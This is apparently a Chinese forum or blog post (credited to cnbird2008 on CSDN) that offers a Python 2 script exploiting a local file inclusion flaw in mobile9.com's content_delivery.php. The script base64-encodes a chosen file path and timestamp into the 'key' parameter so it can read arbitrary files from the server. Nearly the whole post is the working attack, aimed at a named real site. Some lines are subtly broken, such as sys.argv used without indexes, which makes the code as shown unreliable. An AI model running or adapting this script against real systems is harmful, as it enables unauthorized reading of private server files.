mobile9 本地文件包含漏洞
因为他是base64编码的手工测试很麻烦就写了个小工具,高手飘过import urllib2,sys
import httplib
import base64,time
if len(sys.argv) <= 2:
print "=" * 30
print "mobile9.com local exploit by cnb|rd Qq:441303228"
print "Email:Linuxrootkit2008@gmail.com"
print "=" * 30
print "usage: " + sys.argv + " hostname " + " local file "
sys.exit(1)
host = sys.argv
path = sys.argv
file = sys.argv
h = httplib.HTTP(host)
h.putrequest("HEAD", path)
h.putheader("Host", host)
h.endheaders()
okresp, reason, headers = h.getreply()
print "=" * 30
print host + " Server Banner is " + headers.get("Server")
print "=" * 30
print "Local file to read is " + file
time = int(time.time())
serverpath = "/download/content_delivery.php?key="
str = str(file) + "|" + str(time) + "|"
print str
base64file = base64.urlsafe_b64encode(str)
requestpath = serverpath + base64file
print base64file
print requestpath
f = httplib.HTTPConnection(host)
f.request('GET', requestpath)
print f.getresponse().read()
f.close
CSDN博客cnbird2008
页:
[1]